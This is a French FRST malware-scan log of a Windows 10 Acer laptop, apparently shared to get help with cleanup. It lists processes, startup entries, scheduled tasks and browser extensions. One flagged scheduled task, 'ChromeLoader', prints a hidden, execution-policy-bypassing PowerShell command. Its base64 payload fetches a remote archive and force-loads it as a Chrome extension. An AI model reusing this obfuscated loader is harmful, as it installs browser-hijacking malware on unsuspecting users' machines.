cjoint

Publicité


Publicité

Commentaire : FRST

Format du document : text/plain

Prévisualisation

Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021
Exécuté par NzL_O (administrateur) sur LAPTOP-GP6RIR95 (Acer Aspire VN7-591G) (09-01-2022 20:01:58)
Exécuté depuis C:\Users\NzL_O\Desktop
Profils chargés: NzL_O
Plate-forme: Microsoft Windows 10 Famille Version 20H2 19042.1415 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(Acer Incorporated -> ) C:\Program Files (x86)\Acer\abDocs\abDocsDllLoader.exe
(Acer Incorporated -> ) C:\Program Files (x86)\Acer\abDocs\abDocsDllLoaderMonitor.exe
(Acer Incorporated -> ) C:\Program Files (x86)\Acer\Care Center\ACCStd.exe
(Acer Incorporated -> Acer Cloud Technology) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAdminAgent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAgent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALockHandler.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QASvc.exe
(Acer Incorporated -> Acer) C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe
(Avast Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\SecureLine VPN\Vpn.exe <4>
(Avast Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\SecureLine VPN\VpnSvc.exe
(Dashlane -> Dashlane SAS) C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe
(Discord Inc. -> Discord Inc.) C:\Users\NzL_O\AppData\Local\Discord\app-1.0.9003\Discord.exe <6>
(Dolby Laboratories, Inc. -> Dolby Laboratories Inc.) C:\Program Files\Dolby Digital Plus\ddp.exe
(Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <12>
(Intel Corporation - Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation - Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) [Fichier non signé] C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office15\FIRSTRUN.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCopyAccelerator.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Qualcomm Atheros -> Windows (R) Win 7 DDK provider) C:\Windows\System32\AdminService.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Swift Media Entertainment, Inc. -> Blitz, Inc.) C:\Users\NzL_O\AppData\Local\Programs\Blitz\Blitz.exe <7>
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <4>
(Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16152792 2015-07-17] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1394392 2015-07-14] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2754704 2015-06-23] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1571696 2015-06-23] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [Fichier non signé]
HKLM-x32\...\Run: [abDocsDllLoader] => C:\Program Files (x86)\Acer\abDocs\abDocsDllLoader.exe [92928 2015-05-07] (Acer Incorporated -> )
HKLM-x32\...\Run: [BacKGround Agent] => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [66304 2015-05-06] (Acer Incorporated -> Acer Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4267432 2021-12-16] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\...\Run: [Discord] => C:\Users\NzL_O\AppData\Local\Discord\Update.exe [1512608 2021-09-21] (Discord Inc. -> GitHub)
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\...\Run: [com.blitz.app] => C:\Users\NzL_O\AppData\Local\Programs\Blitz\Blitz.exe [121842952 2022-01-08] (Swift Media Entertainment, Inc. -> Blitz, Inc.)
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [33618400 2021-12-28] (Epic Games Inc. -> Epic Games, Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\97.0.4692.71\Installer\chrmstp.exe [2022-01-05] (Google LLC -> Google LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Avast SecureLine VPN.lnk [2021-12-21]
ShortcutTarget: Avast SecureLine VPN.lnk -> C:\Program Files\AVAST Software\SecureLine VPN\Vpn.exe (Avast Software s.r.o. -> AVAST Software)

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {0269F88A-D659-437A-8656-689153BAB150} - System32\Tasks\FUBTrackingByPLD => C:\OEM\Preload\FubTracking\FubTracking.exe [30976 2015-05-14] (Acer Incorporated -> )
Task: {05DDD13D-4BC5-4906-935A-7D5D3B365855} - System32\Tasks\Microsoft\Office\Microsoft Office Touchless Attach Notification => C:\Program Files (x86)\Microsoft Office\Office15\FirstRun.exe [989864 2015-03-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {17ED66E9-4C6A-4B25-ADA8-D8316B351B54} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgBsAGUAYQByAG4AYQB0AGEAbABvAHUAawB0AC4AeAB5AHoAIgAKAAoAJABpAHMATwBwAGUAbgAgAD0AIAAwAAoAJABkAGQAIAA9ACAAMAAKACQAdgBlAHIAIAA9ACAAMAAKAAoAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAdABlAHIAIAAiAG4AYQBtAGUAPQAnAGMAaAByAG8AbQBlAC4AZQB4AGUAJwAiACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoACQBpAGYAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuACIAKQB7AAoACQAJAGIAcgBlAGEAawAKAAkAfQAKAAoACQAkAGkAcwBPAHAAZQBuACAAPQAgADEACgB9AAoACgBpAGYAKAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACkAKQB7AAoACgAJAAkAdAByAHkAewAKAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlAAoACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARgBvAHIAYwBlAAoACgAJAH0ACgAJAGUAbABzAGUAewAKAAoACQAJAHQAcgB5AHsACgAJAAkACQBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGMAbwBuAGYAUABhAHQAaAAiACkACgAJAAkACQB7AAoACQAJAAkACQAkAGMAbwBuAGYAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABjAG8AbgBmAFAAYQB0AGgACgAJAAkACQAJACQAYwBvAG4AZgAuAFMAcABsAGkAdAAoACIAOwAiACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkACQAJAAkACQBpAGYAIAAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBkAGQAIgApAAoACQAJAAkACQAJAHsACgAJAAkACQAJAAkACQAkAGQAZAAgAD0AIAAkAF8ALgBTAHAAbABpAHQAKAAnACIAJwApAFsAMQBdAAoACQAJAAkACQAJAH0AZQBsAHMAZQBpAGYAIAAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBFAHgAdABlAG4AcwBpAG8AbgBWAGUAcgBzAGkAbwBuACIAKQAKAAkACQAJAAkACQB7AAoACQAJAAkACQAJAAkAJAB2AGUAcgAgAD0AIAAkAF8ALgBTAHAAbABpAHQAKAAnACIAJwApAFsAMQBdAAoACQAJAAkACQAJAH0ACgAJAAkACQAJAH0ACgAJAAkACQB9AAoACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAGkAZgAgACgAJABkAGQAIAAtAGEAbgBkACAAJAB2AGUAcgApAHsACgAKAAoACQAJAAkAdAByAHkAewAKAAoACQAJAAkACQAkAHUAbgAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAHUAbgA/AGQAaQBkAD0AJABkAGQAJgB2AGUAcgA9ACQAdgBlAHIAIgAKAAoACQAJAAkACQBpAGYAKAAkAHUAbgAgAC0ATQBhAHQAYwBoACAAIgAkAGQAZAAiACkAewAKAAkACQAJAAkACQBVAG4AcgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgAkAHQAYQBzAGsATgBhAG0AZQAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUACgAJAAkACQAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAEyBwAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlACAALQBSAGUAYwB1AHIAcwBlAAoACQAJAAkACQB9AAoACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwAD8AZABpAGQAPQAkAGQAZAAmAHYAZQByAD0AJAB2AGUAcgAiACAALQBvAHUAdABmAGkAbABlACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiAAoACQAJAAkAfQAKAAkACQAJAGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAKQB7AAoACQAJAAkACQBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAEwAaQB0AGUAcgBhAGwAUABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACAALQBGAG8AcgBjAGUACgAJAAkACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARgBvAHIAYwBlAAoACQAJAAkAfQAKAAoACQAJAH0ACgAKAAkAfQAKAAoACQB0AHIAeQB7AAoACQAJAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGMAaAByAG8AbQBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBDAGwAbwBzAGUATQBhAGkAbgBXAGkAbgBkAG8AdwAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAH0ACgAJAAkAcwB0AGEAcgB0ACAAYwBoAHIAbwBtAGUAIAAtAC0AbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuAD0AIgAkAGUAeAB0AFAAYQB0AGgAIgAsACAALQAtAHIAZQBzAHQAbwByAGUALQBsAGEAcwB0AC0AcwBlAHMAcwBpAG8AbgAsACAALQAtAG4AbwBlAHIAcgBkAGkAYQBsAG8AZwBzACwAIAAtAC0AZABpAHMAYQBiAGwAZQAtAHMAZQBzAHMAaQBvAG4ALQBjAHIAYQBzAGgAZQBkAC0AYgB1AGIAYgBsAGUACgAJAH0AYwBhAHQAYwBoAHsAfQAKAAoAfQA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus). (Pas de fichier) <==== ATTENTION
Task: {1F14636B-3E4A-4D76-A22B-4047EBF122C9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-11-14] (Google LLC -> Google LLC)
Task: {228FDDE6-C0E6-4B02-98BD-F15CEFFC995A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-11-14] (Google LLC -> Google LLC)
Task: {256BE520-4CD0-48EA-8A44-37552F151231} - System32\Tasks\Avast SecureLine VPN Update => C:\Program Files\Avast Software\SecureLine VPN\VpnUpdate.exe [1226520 2021-12-20] (Avast Software s.r.o. -> AVAST Software)
Task: {25D06F84-3B89-4F57-B4EB-AEEB94772FA6} - System32\Tasks\Avast Software\Avast SecureLine VPN Update => C:\Program Files\Common Files\Avast Software\Icarus\avast-vpn\icarus.exe [6475544 2021-12-14] (Avast Software s.r.o. -> Avast Software)
Task: {3BEB0F06-80E0-4A06-87A8-2EA0F49C9148} - System32\Tasks\WpsUpdateTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdate.exe [474472 2016-04-14] (Zhuhai Kingsoft Office Software Co.,Ltd -> Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {4E53AF93-0F08-4BCE-A1E8-A9808C389146} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2574080 2015-05-07] (Acer Incorporated -> Acer)
Task: {55F76E7D-F5FC-43DF-A21C-F872A405D872} - System32\Tasks\WpsNotifyTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsnotify.exe [517480 2016-04-14] (Zhuhai Kingsoft Office Software Co.,Ltd -> Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {748C56D9-D949-423A-BAD8-FA08023868C5} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [472928 2015-07-17] (Acer Incorporated -> Acer Incorporated)
Task: {82DCCED7-A6E9-437C-A54F-1FC2A0E8F0CC} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTrayLauncher.exe [384256 2015-05-14] (Acer Incorporated -> Acer Incorporated)
Task: {91F9D2B6-9405-4B55-8297-BF24C7AD5C78} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [40288 2015-07-10] (Acer Incorporated -> )
Task: {963D0548-1350-439C-91DB-3B3E394E6CEE} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2858336 2015-07-10] (Acer Incorporated -> )
Task: {990840B6-1D29-4796-8B6E-5633AB46887E} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe /nogui (Pas de fichier)
Task: {99947389-CDA2-4048-808A-A6DD33033CB9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AB29049B-63BE-46E9-BC3E-DB9730B3472D} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe [585600 2014-04-07] (Dolby Laboratories, Inc. -> Dolby Laboratories Inc.)
Task: {B4C5195B-AEE2-4AD8-9203-D9CADE87E033} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B98F5028-6651-4C09-98E8-AE293513B817} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C493888B-F10D-41C8-884B-493C5A19C0B4} - System32\Tasks\Avast Software\Avast SecureLine VPN Bug Report => C:\Program Files\Avast Software\SecureLine VPN\AvBugReport.exe [4760344 2021-12-20] (Avast Software s.r.o. -> AVAST Software) -> --send "dumps|report" --silent --product 11 --programpath "C:\Program Files\Avast Software\SecureLine VPN" --configpath "C:\ProgramData\Avast Software\SecureLine VPN" --path "C:\ProgramData\Avast Software\SecureLine VPN\log" --path "C:\ProgramData\Avast Software\Icarus\Logs" --logpath "C:\ProgramData\Avast Software\SecureLine VPN\log" --guid f723b198-e255-4262-b5b6-ac424a5c84c8
Task: {C5A3953B-2519-402A-90DB-1F963A64A611} - System32\Tasks\Microsoft\Windows\WindowsUpdate\RUXIM\RUXIMDisplay => C:\Program Files\ruxim\ruximics.exe [477512 2021-05-19] (Microsoft Windows -> Microsoft Corporation)
Task: {CD6F702C-470B-4241-8589-E1071B89BA8F} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [4580704 2015-07-10] (Acer Incorporated -> )
Task: {DB4A415B-0C0F-44CC-BD8F-12F69F242D00} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {E6749EA1-2BD3-4D47-9F81-D96871D67DCE} - System32\Tasks\Microsoft\Windows\WindowsUpdate\RUXIM\RUXIMSync => C:\Program Files\ruxim\ruximics.exe [477512 2021-05-19] (Microsoft Windows -> Microsoft Corporation)
Task: {EEBCCD6C-8BB0-4F76-A38C-93E62BAF9791} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [379232 2015-07-17] (Acer Incorporated -> Acer Incorporated)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\WINDOWS\Tasks\WpsNotifyTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsnotify.exe
Task: C:\WINDOWS\Tasks\WpsUpdateTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdate.exe

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{44eda934-1985-4c79-bff9-95c9633967c3}: [DhcpNameServer] 192.18.128.24
Tcpip\..\Interfaces\{4e019667-9923-448a-a780-97532ee0b89c}: [DhcpNameServer] 192.168.1.1

Edge:
=======
Edge Profile: C:\Users\NzL_O\AppData\Local\Microsoft\Edge\User Data\Default [2021-12-28]

FireFox:
========
FF DefaultProfile: mnt7dg4c.default
FF ProfilePath: C:\Users\NzL_O\AppData\Roaming\Mozilla\Firefox\Profiles\mnt7dg4c.default [2021-11-14]
FF Homepage: Mozilla\Firefox\Profiles\mnt7dg4c.default -> hxxps://www.google.fr/#spf=1636896920582
FF Extension: (Français Language Pack) - C:\Users\NzL_O\AppData\Roaming\Mozilla\Firefox\Profiles\mnt7dg4c.default\Extensions\langpack-fr@firefox.mozilla.org [2021-11-14] []
FF Extension: (Mozilla Partner Defaults) - C:\Users\NzL_O\AppData\Roaming\Mozilla\Firefox\Profiles\mnt7dg4c.default\Extensions\partnerdefaults@mozilla.com [2021-11-14] []
FF Extension: (Français Language Pack) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\langpack-fr@firefox.mozilla.org [2021-11-14] []
FF Extension: (Mozilla Partner Defaults) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\partnerdefaults@mozilla.com [2021-11-14] []
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2021-11-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2021-11-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel(R) Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel(R) Identity Protection Technology Software -> Intel Corporation)

Chrome:
=======
CHR DefaultProfile: Profile 2
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default [2021-12-20]
CHR Notifications: Default -> hxxps://play.pokemonshowdown.com; hxxps://www.facebook.com; hxxps://www.romstation.fr
CHR Session Restore: Default -> est activé.
CHR Extension: (Slides) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-11-14]
CHR Extension: (Docs) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-11-14]
CHR Extension: (Google Drive) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-11-14]
CHR Extension: (YouTube) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-11-14]
CHR Extension: (Sheets) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-11-14]
CHR Extension: (Google Docs hors connexion) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-12-05]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-11-14]
